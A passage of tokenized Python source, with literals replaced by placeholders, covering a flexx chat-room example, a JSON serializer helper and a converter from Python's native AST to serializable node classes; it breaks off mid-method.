<s> """<STR_LIT>""" <EOL> from flexx import app , ui , react <EOL> nsamples = <NUM_LIT:16> <EOL> @ react . input <EOL> def message_relay ( msg ) : <EOL> """<STR_LIT>""" <EOL> return msg + '<STR_LIT>' <EOL> class MessageBox ( ui . Label ) : <EOL> CSS = """<STR_LIT>""" <EOL> @ app . serve <EOL> class ChatRoom ( ui . Widget ) : <EOL> """<STR_LIT>""" <EOL> def init ( self ) : <EOL> with ui . HBox ( ) : <EOL> ui . Widget ( flex = <NUM_LIT:1> ) <EOL> with ui . VBox ( ) : <EOL> self . name = ui . LineEdit ( placeholder_text = '<STR_LIT>' ) <EOL> self . people = ui . Label ( flex = <NUM_LIT:1> , size = ( <NUM_LIT> , <NUM_LIT:0> ) ) <EOL> with ui . VBox ( ) : <EOL> self . messages = MessageBox ( flex = <NUM_LIT:1> ) <EOL> with ui . HBox ( ) : <EOL> self . message = ui . LineEdit ( flex = <NUM_LIT:1> , placeholder_text = '<STR_LIT>' ) <EOL> self . ok = ui . Button ( text = '<STR_LIT>' ) <EOL> ui . Widget ( flex = <NUM_LIT:1> ) <EOL> self . _update_participants ( ) <EOL> def _update_participants ( self ) : <EOL> if not self . session . status : <EOL> return <EOL> proxies = app . manager . get_connections ( self . __class__ . __name__ ) <EOL> names = [ p . app . name . text ( ) for p in proxies ] <EOL> text = '<STR_LIT>' % len ( names ) <EOL> text += '<STR_LIT>' . join ( [ name or '<STR_LIT>' for name in sorted ( names ) ] ) <EOL> self . people . text ( text ) <EOL> app . call_later ( <NUM_LIT:3> , self . _update_participants ) <EOL> @ react . connect ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _send_message ( self , down , submit ) : <EOL> text = self . message . text ( ) <EOL> if text : <EOL> name = self . name . text ( ) or '<STR_LIT>' <EOL> message_relay ( '<STR_LIT>' % ( name , text ) ) <EOL> self . message . text ( '<STR_LIT>' ) <EOL> @ react . connect ( '<STR_LIT>' ) <EOL> def new_text ( self , text ) : <EOL> return text <EOL> class JS : <EOL> @ react . connect ( '<STR_LIT>' ) <EOL> def _update_total_text ( self , text ) : <EOL> self . messages . text ( self . messages . 
text ( ) + text ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . start ( ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> undefined = None <EOL> class JSON : <EOL> @ staticmethod <EOL> def parse ( text , reviver = None ) : <EOL> return json . loads ( text , object_hook = reviver ) <EOL> @ staticmethod <EOL> def stringify ( obj , replacer = None ) : <EOL> return json . dumps ( obj , default = replacer ) <EOL> class Serializer : <EOL> def __init__ ( self ) : <EOL> self . _revivers = _revivers = { } <EOL> def loads ( text ) : <EOL> return JSON . parse ( text , _reviver ) <EOL> def saves ( obj ) : <EOL> return JSON . stringify ( obj , _replacer ) <EOL> def add_reviver ( type_name , func ) : <EOL> assert isinstance ( type_name , str ) <EOL> _revivers [ type_name ] = func <EOL> def _reviver ( dct , val = undefined ) : <EOL> if val is not undefined : <EOL> dct = val <EOL> if isinstance ( dct , dict ) : <EOL> type = dct . get ( '<STR_LIT>' , None ) <EOL> if type is not None : <EOL> func = _revivers . get ( type , None ) <EOL> if func is not None : <EOL> return func ( dct ) <EOL> return dct <EOL> def _replacer ( obj , val = undefined ) : <EOL> if val is undefined : <EOL> try : <EOL> return obj . __json__ ( ) <EOL> except AttributeError : <EOL> raise TypeError ( '<STR_LIT>' % obj ) <EOL> else : <EOL> if ( val is not None ) and val . __json__ : <EOL> return val . __json__ ( ) <EOL> return val <EOL> self . loads = loads <EOL> self . saves = saves <EOL> self . add_reviver = add_reviver <EOL> serializer = Serializer ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , absolute_import <EOL> import sys <EOL> import ast <EOL> import json <EOL> from base64 import encodestring as encodebytes , decodestring as decodebytes <EOL> pyversion = sys . version_info <EOL> NoneType = None . __class__ <EOL> if pyversion >= ( <NUM_LIT:3> , ) : <EOL> basestring = str <EOL> docheck = '<STR_LIT>' in sys . modules <EOL> def parse ( code , comments = False ) : <EOL> """<STR_LIT>""" <EOL> converter = NativeAstConverter ( code ) <EOL> return converter . convert ( comments ) <EOL> class Node ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class OPS : <EOL> """<STR_LIT>""" <EOL> UAdd = '<STR_LIT>' <EOL> USub = '<STR_LIT>' <EOL> Not = '<STR_LIT>' <EOL> Invert = '<STR_LIT>' <EOL> Add = '<STR_LIT>' <EOL> Sub = '<STR_LIT>' <EOL> Mult = '<STR_LIT>' <EOL> Div = '<STR_LIT>' <EOL> FloorDiv = '<STR_LIT>' <EOL> Mod = '<STR_LIT>' <EOL> Pow = '<STR_LIT>' <EOL> LShift = '<STR_LIT>' <EOL> RShift = '<STR_LIT>' <EOL> BitOr = '<STR_LIT>' <EOL> BitXor = '<STR_LIT>' <EOL> BitAnd = '<STR_LIT>' <EOL> And = '<STR_LIT>' <EOL> Or = '<STR_LIT>' <EOL> class COMP : <EOL> """<STR_LIT>""" <EOL> Eq = '<STR_LIT>' <EOL> NotEq = '<STR_LIT>' <EOL> Lt = '<STR_LIT>' <EOL> LtE = '<STR_LIT>' <EOL> Gt = '<STR_LIT>' <EOL> GtE = '<STR_LIT>' <EOL> Is = '<STR_LIT>' <EOL> IsNot = '<STR_LIT>' <EOL> In = '<STR_LIT>' <EOL> NotIn = '<STR_LIT>' <EOL> def __init__ ( self , * args ) : <EOL> names = self . __slots__ <EOL> assert len ( args ) == len ( names ) <EOL> if docheck : <EOL> assert not hasattr ( self , '<STR_LIT>' ) , '<STR_LIT>' <EOL> assert self . __class__ is not Node , '<STR_LIT>' <EOL> for name , val in zip ( names , args ) : <EOL> assert not isinstance ( val , ast . AST ) <EOL> if name == '<STR_LIT:name>' : <EOL> assert isinstance ( val , ( basestring , NoneType ) ) , '<STR_LIT>' <EOL> elif name == '<STR_LIT>' : <EOL> assert val in Node . OPS . __dict__ or val in Node . COMP . 
__dict__ <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> assert isinstance ( val , ( Node , NoneType ) ) , '<STR_LIT>' % name <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> islistofnodes = ( isinstance ( val , list ) and <EOL> all ( isinstance ( n , Node ) for n in val ) ) <EOL> assert islistofnodes , '<STR_LIT>' % name <EOL> else : <EOL> assert not isinstance ( val , Node ) , '<STR_LIT>' % name <EOL> assert not ( isinstance ( val , list ) and <EOL> all ( isinstance ( n , Node ) for n in val ) ) <EOL> for name , val in zip ( names , args ) : <EOL> setattr ( self , name , val ) <EOL> def tojson ( self , indent = <NUM_LIT:2> ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( self . _todict ( ) , indent = indent , sort_keys = True ) <EOL> @ classmethod <EOL> def fromjson ( cls , text ) : <EOL> """<STR_LIT>""" <EOL> return Node . _fromdict ( json . loads ( text ) ) <EOL> @ classmethod <EOL> def _fromdict ( cls , d ) : <EOL> assert '<STR_LIT>' in d <EOL> Cls = globals ( ) [ d [ '<STR_LIT>' ] ] <EOL> args = [ ] <EOL> for name in Cls . __slots__ : <EOL> val = d [ name ] <EOL> if val is None : <EOL> pass <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> val = Node . _fromdict ( val ) <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> val = [ Node . _fromdict ( x ) for x in val ] <EOL> elif isinstance ( val , basestring ) : <EOL> if val . startswith ( '<STR_LIT>' ) : <EOL> val = decodebytes ( val [ <NUM_LIT:6> : ] . encode ( '<STR_LIT:utf-8>' ) ) <EOL> elif val . startswith ( '<STR_LIT>' ) : <EOL> val = complex ( val [ <NUM_LIT:8> : ] ) <EOL> elif pyversion < ( <NUM_LIT:3> , ) : <EOL> val = unicode ( val ) <EOL> args . append ( val ) <EOL> return Cls ( * args ) <EOL> def _todict ( self ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> d [ '<STR_LIT>' ] = self . __class__ . __name__ <EOL> for name in self . __slots__ : <EOL> val = getattr ( self , name ) <EOL> if val is None : <EOL> pass <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> val = val . 
_todict ( ) <EOL> elif name . endswith ( '<STR_LIT>' ) : <EOL> val = [ x . _todict ( ) for x in val ] <EOL> elif isinstance ( self , Bytes ) and isinstance ( val , bytes ) : <EOL> val = '<STR_LIT>' + encodebytes ( val ) . decode ( '<STR_LIT:utf-8>' ) . rstrip ( ) <EOL> elif isinstance ( self , Num ) and isinstance ( val , complex ) : <EOL> val = '<STR_LIT>' + repr ( val ) <EOL> d [ name ] = val <EOL> return d <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , Node ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return self . _todict ( ) == other . _todict ( ) <EOL> def __repr__ ( self ) : <EOL> names = '<STR_LIT:U+002CU+0020>' . join ( [ repr ( x ) for x in self . __slots__ ] ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , names , id ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . tojson ( ) <EOL> try : <EOL> Node . OPS . __doc__ += '<STR_LIT:U+002CU+0020>' . join ( [ x for x in sorted ( Node . OPS . __dict__ ) <EOL> if not x . startswith ( '<STR_LIT:_>' ) ] ) <EOL> Node . COMP . __doc__ += '<STR_LIT:U+002CU+0020>' . join ( [ x for x in sorted ( Node . COMP . __dict__ ) <EOL> if not x . 
startswith ( '<STR_LIT:_>' ) ] ) <EOL> except AttributeError : <EOL> pass <EOL> class Comment ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class Module ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Num ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class Str ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class Bytes ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class List ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Tuple ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Set ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Dict ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Ellipsis ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> class NameConstant ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:value>' , <EOL> class Name ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:name>' , <EOL> class Starred ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Attribute ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Subscript ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Index ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Slice ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class ExtSlice ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Expr ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class UnaryOp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class BinOp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class BoolOp ( Node ) : <EOL> 
"""<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Compare ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Call ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Keyword ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> class IfExp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class ListComp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class SetComp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class GeneratorExp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class DictComp ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Comprehension ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Assign ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class AugAssign ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Raise ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Assert ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class Delete ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Pass ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> class Import ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT:root>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class If ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class For ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class While ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = 
'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class Break ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> class Continue ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> class Try ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class ExceptHandler ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' <EOL> class With ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class WithItem ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' <EOL> class FunctionDef ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class Lambda ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class Arg ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Return ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Yield ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class YieldFrom ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Global ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class Nonlocal ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , <EOL> class ClassDef ( Node ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class NativeAstConverter : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , code ) : <EOL> self . _root = ast . parse ( code ) <EOL> self . _lines = code . splitlines ( ) <EOL> self . _stack = [ ] <EOL> def _add_comments ( self , container , lineno ) : <EOL> """<STR_LIT>""" <EOL> linenr1 = self . 
_comment_pointer <EOL> linenr2 = lineno <EOL> self . _comment_pointer = linenr2 + <NUM_LIT:1> <EOL> for i in range ( linenr1 , linenr2 ) : <EOL> line = self . _lines [ i - <NUM_LIT:1> ] <EOL> if line . lstrip ( ) . startswith ( '<STR_LIT:#>' ) : <EOL> before , _ , comment = line . partition ( '<STR_LIT:#>' ) <EOL> node = Comment ( comment ) <EOL> node . lineno = i <EOL> node . col_offset = len ( before ) <EOL> container . append ( node ) <EOL> def convert ( self , comments = False ) : <EOL> assert not self . _stack <EOL> self . _comment_pointer = <NUM_LIT:1> <EOL> result = self . _convert ( self . _root ) <EOL> while self . _stack : <EOL> container , native_nodes = self . _stack . pop ( <NUM_LIT:0> ) <EOL> for native_node in native_nodes : <EOL> node = self . _convert ( native_node ) <EOL> if comments : <EOL> self . _add_comments ( container , node . lineno ) <EOL> container . append ( node ) <EOL> return result <EOL> def _convert ( self , n ) : <EOL> if n is None : <EOL> return None <EOL> assert isinstance ( n , ast . AST ) <EOL> type = n . __class__ . __name__ <EOL> try : <EOL> converter = getattr ( self , '<STR_LIT>' + type ) <EOL> except AttributeError : <EOL> raise RuntimeError ( '<STR_LIT>' % type ) <EOL> val = converter ( n ) <EOL> assert isinstance ( val , Node ) <EOL> val . lineno = getattr ( n , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> val . col_offset = getattr ( n , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> return val <EOL> def _convert_Module ( self , n ) : <EOL> node = Module ( [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node <EOL> def _convert_Num ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , ) and str ( n . n ) . startswith ( '<STR_LIT:->' ) : <EOL> return UnaryOp ( Node . OPS . USub , Num ( - n . n ) ) <EOL> return Num ( n . n ) <EOL> def _convert_Str ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , ) and self . _lines [ n . lineno - <NUM_LIT:1> ] [ n . col_offset ] == '<STR_LIT:b>' : <EOL> return Bytes ( n . 
s ) <EOL> return Str ( n . s ) <EOL> def _convert_Bytes ( self , n ) : <EOL> return Bytes ( n . s ) <EOL> def _convert_List ( self , n ) : <EOL> c = self . _convert <EOL> return List ( [ c ( x ) for x in n . elts ] ) <EOL> def _convert_Tuple ( self , n ) : <EOL> c = self . _convert <EOL> return Tuple ( [ c ( x ) for x in n . elts ] ) <EOL> def _convert_Set ( self , n ) : <EOL> c = self . _convert <EOL> return Set ( [ c ( x ) for x in n . elts ] ) <EOL> def _convert_Dict ( self , n ) : <EOL> c = self . _convert <EOL> return Dict ( [ c ( x ) for x in n . keys ] , [ c ( x ) for x in n . values ] ) <EOL> def _convert_Ellipsis ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> return Index ( Ellipsis ( ) ) <EOL> return Ellipsis ( ) <EOL> def _convert_NameConstant ( self , n ) : <EOL> return NameConstant ( n . value ) <EOL> def _convert_Name ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> M = { '<STR_LIT:None>' : None , '<STR_LIT:False>' : False , '<STR_LIT:True>' : True } <EOL> if n . id in M : <EOL> return NameConstant ( M [ n . id ] ) <EOL> if pyversion < ( <NUM_LIT:3> , ) and isinstance ( n . ctx , ast . Param ) : <EOL> return Arg ( n . id , None , None ) <EOL> return Name ( n . id ) <EOL> def _convert_Starred ( self , n ) : <EOL> return Starred ( self . _convert ( n . value ) ) <EOL> def _convert_Attribute ( self , n ) : <EOL> return Attribute ( self . _convert ( n . value ) , n . attr ) <EOL> def _convert_Subscript ( self , n ) : <EOL> return Subscript ( self . _convert ( n . value ) , self . _convert ( n . slice ) ) <EOL> def _convert_Index ( self , n ) : <EOL> return Index ( self . _convert ( n . value ) ) <EOL> def _convert_Slice ( self , n ) : <EOL> c = self . _convert <EOL> step = c ( n . step ) <EOL> if pyversion < ( <NUM_LIT:3> , ) and isinstance ( step , NameConstant ) and step . value is None : <EOL> if not self . _lines [ n . step . lineno - <NUM_LIT:1> ] [ n . step . col_offset : ] . 
startswith ( '<STR_LIT:None>' ) : <EOL> step = None <EOL> return Slice ( c ( n . lower ) , c ( n . upper ) , step ) <EOL> def _convert_ExtSlice ( self , n ) : <EOL> c = self . _convert <EOL> return ExtSlice ( [ c ( x ) for x in n . dims ] ) <EOL> def _convert_Expr ( self , n ) : <EOL> return Expr ( self . _convert ( n . value ) ) <EOL> def _convert_UnaryOp ( self , n ) : <EOL> op = n . op . __class__ . __name__ <EOL> return UnaryOp ( op , self . _convert ( n . operand ) ) <EOL> def _convert_BinOp ( self , n ) : <EOL> op = n . op . __class__ . __name__ <EOL> return BinOp ( op , self . _convert ( n . left ) , self . _convert ( n . right ) ) <EOL> def _convert_BoolOp ( self , n ) : <EOL> c = self . _convert <EOL> op = n . op . __class__ . __name__ <EOL> return BoolOp ( op , [ c ( x ) for x in n . values ] ) <EOL> def _convert_Compare ( self , n ) : <EOL> c = self . _convert <EOL> comps = [ c ( x ) for x in ( [ n . left ] + n . comparators ) ] <EOL> ops = [ op . __class__ . __name__ for op in n . ops ] <EOL> assert len ( ops ) == ( len ( comps ) - <NUM_LIT:1> ) <EOL> compares = [ ] <EOL> for i in range ( len ( ops ) ) : <EOL> co = Compare ( ops [ i ] , comps [ i ] , comps [ i + <NUM_LIT:1> ] ) <EOL> compares . append ( co ) <EOL> assert compares <EOL> if len ( compares ) == <NUM_LIT:1> : <EOL> return compares [ <NUM_LIT:0> ] <EOL> else : <EOL> return BoolOp ( Node . OPS . And , compares ) <EOL> def _convert_Call ( self , n ) : <EOL> c = self . _convert <EOL> arg_nodes = [ c ( a ) for a in n . args ] <EOL> kwarg_nodes = [ c ( a ) for a in n . keywords ] <EOL> if pyversion < ( <NUM_LIT:3> , <NUM_LIT:5> ) : <EOL> if n . starargs : <EOL> arg_nodes . append ( Starred ( c ( n . starargs ) ) ) <EOL> if n . kwargs : <EOL> kwarg_nodes . append ( Keyword ( None , c ( n . kwargs ) ) ) <EOL> return Call ( c ( n . func ) , arg_nodes , kwarg_nodes ) <EOL> def _convert_keyword ( self , n ) : <EOL> return Keyword ( n . arg , self . _convert ( n . 
value or None ) ) <EOL> def _convert_IfExp ( self , n ) : <EOL> c = self . _convert <EOL> return IfExp ( c ( n . test ) , c ( n . body ) , c ( n . orelse ) ) <EOL> def _convert_ListComp ( self , n ) : <EOL> c = self . _convert <EOL> return ListComp ( c ( n . elt ) , [ c ( x ) for x in n . generators ] ) <EOL> def _convert_SetComp ( self , n ) : <EOL> c = self . _convert <EOL> return SetComp ( c ( n . elt ) , [ c ( x ) for x in n . generators ] ) <EOL> def _convert_GeneratorExp ( self , n ) : <EOL> c = self . _convert <EOL> return GeneratorExp ( c ( n . elt ) , [ c ( x ) for x in n . generators ] ) <EOL> def _convert_DictComp ( self , n ) : <EOL> c = self . _convert <EOL> return DictComp ( c ( n . key ) , c ( n . value ) , [ c ( x ) for x in n . generators ] ) <EOL> def _convert_comprehension ( self , n ) : <EOL> c = self . _convert <EOL> return Comprehension ( c ( n . target ) , c ( n . iter ) , [ c ( x ) for x in n . ifs ] ) <EOL> def _convert_Assign ( self , n ) : <EOL> c = self . _convert <EOL> return Assign ( [ c ( x ) for x in n . targets ] , c ( n . value ) ) <EOL> def _convert_AugAssign ( self , n ) : <EOL> op = n . op . __class__ . __name__ <EOL> return AugAssign ( self . _convert ( n . target ) , op , self . _convert ( n . value ) ) <EOL> def _convert_Print ( self , n ) : <EOL> c = self . _convert <EOL> if len ( n . values ) == <NUM_LIT:1> and isinstance ( n . values [ <NUM_LIT:0> ] , ast . Tuple ) : <EOL> arg_nodes = [ c ( x ) for x in n . values [ <NUM_LIT:0> ] . elts ] <EOL> else : <EOL> arg_nodes = [ c ( x ) for x in n . values ] <EOL> kwarg_nodes = [ ] <EOL> if n . dest is not None : <EOL> kwarg_nodes . append ( Keyword ( '<STR_LIT>' , c ( n . dest ) ) ) <EOL> if not n . nl : <EOL> kwarg_nodes . append ( Keyword ( '<STR_LIT:end>' , Str ( '<STR_LIT>' ) ) ) <EOL> return Expr ( Call ( Name ( '<STR_LIT>' ) , arg_nodes , kwarg_nodes ) ) <EOL> def _convert_Exec ( self , n ) : <EOL> c = self . _convert <EOL> arg_nodes = [ c ( n . body ) ] <EOL> arg_nodes . 
append ( c ( n . globals ) or NameConstant ( None ) ) <EOL> arg_nodes . append ( c ( n . locals ) or NameConstant ( None ) ) <EOL> return Expr ( Call ( Name ( '<STR_LIT>' ) , arg_nodes , [ ] ) ) <EOL> def _convert_Repr ( self , n ) : <EOL> c = self . _convert <EOL> return Call ( Name ( '<STR_LIT>' ) , [ c ( n . value ) ] , [ ] ) <EOL> def _convert_Raise ( self , n ) : <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> if n . inst or n . tback : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return Raise ( self . _convert ( n . type ) , None ) <EOL> return Raise ( self . _convert ( n . exc ) , self . _convert ( n . cause ) ) <EOL> def _convert_Assert ( self , n ) : <EOL> return Assert ( self . _convert ( n . test ) , self . _convert ( n . msg ) ) <EOL> def _convert_Delete ( self , n ) : <EOL> c = self . _convert <EOL> return Delete ( [ c ( x ) for x in n . targets ] ) <EOL> def _convert_Pass ( self , n ) : <EOL> return Pass ( ) <EOL> def _convert_Import ( self , n ) : <EOL> return Import ( None , [ ( x . name , x . asname ) for x in n . names ] , <NUM_LIT:0> ) <EOL> def _convert_ImportFrom ( self , n ) : <EOL> names = [ ( x . name , x . asname ) for x in n . names ] <EOL> return Import ( n . module , names , n . level ) <EOL> def _convert_If ( self , n ) : <EOL> c = self . _convert <EOL> node = If ( c ( n . test ) , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> return node <EOL> def _convert_For ( self , n ) : <EOL> c = self . _convert <EOL> node = For ( c ( n . target ) , c ( n . iter ) , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> return node <EOL> def _convert_While ( self , n ) : <EOL> c = self . _convert <EOL> node = While ( c ( n . test ) , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . 
append ( ( node . else_nodes , n . orelse ) ) <EOL> return node <EOL> def _convert_Break ( self , n ) : <EOL> return Break ( ) <EOL> def _convert_Continue ( self , n ) : <EOL> return Continue ( ) <EOL> def _convert_Try ( self , n ) : <EOL> c = self . _convert <EOL> node = Try ( [ ] , [ c ( x ) for x in n . handlers ] , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> self . _stack . append ( ( node . finally_nodes , n . finalbody ) ) <EOL> return node <EOL> def _convert_TryFinally ( self , n ) : <EOL> c = self . _convert <EOL> if ( len ( n . body ) == <NUM_LIT:1> ) and n . body [ <NUM_LIT:0> ] . __class__ . __name__ == '<STR_LIT>' : <EOL> n2 = n . body [ <NUM_LIT:0> ] <EOL> node = Try ( [ ] , [ c ( x ) for x in n2 . handlers ] , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n2 . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n2 . orelse ) ) <EOL> self . _stack . append ( ( node . finally_nodes , n . finalbody ) ) <EOL> else : <EOL> node = Try ( [ ] , [ ] , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . finally_nodes , n . finalbody ) ) <EOL> return node <EOL> def _convert_TryExcept ( self , n ) : <EOL> c = self . _convert <EOL> node = Try ( [ ] , [ c ( x ) for x in n . handlers ] , [ ] , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> self . _stack . append ( ( node . else_nodes , n . orelse ) ) <EOL> return node <EOL> def _convert_ExceptHandler ( self , n ) : <EOL> c = self . _convert <EOL> name = n . name . id if isinstance ( n . name , ast . Name ) else n . name <EOL> node = ExceptHandler ( c ( n . type ) , name , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node <EOL> def _convert_With ( self , n ) : <EOL> c = self . 
